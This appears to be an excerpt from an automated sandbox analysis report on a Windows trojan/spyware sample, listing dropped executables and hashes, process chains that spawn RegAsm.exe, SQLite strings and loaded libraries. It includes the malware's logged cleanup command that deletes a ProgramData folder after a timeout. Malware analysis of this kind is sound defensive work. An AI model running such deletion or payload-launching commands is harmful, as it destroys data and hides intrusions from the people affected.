Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042CEC0	10_2_0042CEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00429EE0	10_2_00429EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00410E90	10_2_00410E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040BFC0	10_2_0040BFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22424CF0	14_2_22424CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2241EA80	14_2_2241EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2243BAB0	14_2_2243BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22429000	14_2_22429000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22447810	14_2_22447810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2241F160	14_2_2241F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2244CE10	14_2_2244CE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_224266C0	14_2_224266C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22456E80	14_2_22456E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22441C50	14_2_22441C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2243A560	14_2_2243A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2241D57C	14_2_2241D57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2257A2C0	14_2_2257A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2258DB30	14_2_2258DB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225933E0	14_2_225933E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2257F8D0	14_2_2257F8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2259D100	14_2_2259D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225A3920	14_2_225A3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225961E0	14_2_225961E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225A16D0	14_2_225A16D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22579430	14_2_22579430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22579CC0	14_2_22579CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2259FD50	14_2_2259FD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225A5F40	14_2_225A5F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225C4FB2	14_2_225C4FB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2260226A	14_2_2260226A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22609390	14_2_22609390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22609A20	14_2_22609A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225EAEBE	14_2_225EAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22609F80	14_2_22609F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225AD7C0	14_2_225AD7C0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\DBGIJEHIID.exe 2B8BCD9D7D072FEB114E0436DC10AA80FDA52CDD46A4948EA1AE984F74898375
Source: Joe Sandbox View	Dropped File: C:\ProgramData\EGDGCGCFHI.exe DE664956D799E59E1CCA0788D545922EE420E3AFDCF277442F148F52BC78DF89

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C54CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C5594D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CB10 appears 57 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041DBA0 appears 150 times

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2112144297.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.2107399987.0000000000A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVQP.exe\ vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KECBKKEBKE.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66fa2b049020f_ldnf[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EGDGCGCFHI.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66fa2afc5abea_vasd[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DBGIJEHIID.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@46/62@22/9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C577030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6C577030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
Source: C:\Users\userIJEGDBGDBF.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	ReversingLabs: Detection: 50%
Source: file.exe	Virustotal: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KECBKKEBKE.exe "C:\ProgramData\KECBKKEBKE.exe"
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\EGDGCGCFHI.exe "C:\ProgramData\EGDGCGCFHI.exe"
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DBGIJEHIID.exe "C:\ProgramData\DBGIJEHIID.exe"
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FIJKEHJJDAAK" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userGIEGHJEGHJ.exe "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Users\userGIEGHJEGHJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Users\userGIEGHJEGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIJEGDBGDBF.exe "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Users\userIJEGDBGDBF.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userIJEGDBGDBF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KECBKKEBKE.exe "C:\ProgramData\KECBKKEBKE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\EGDGCGCFHI.exe "C:\ProgramData\EGDGCGCFHI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DBGIJEHIID.exe "C:\ProgramData\DBGIJEHIID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FIJKEHJJDAAK" & exit	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userGIEGHJEGHJ.exe "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Users\userGIEGHJEGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIJEGDBGDBF.exe "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Users\userIJEGDBGDBF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
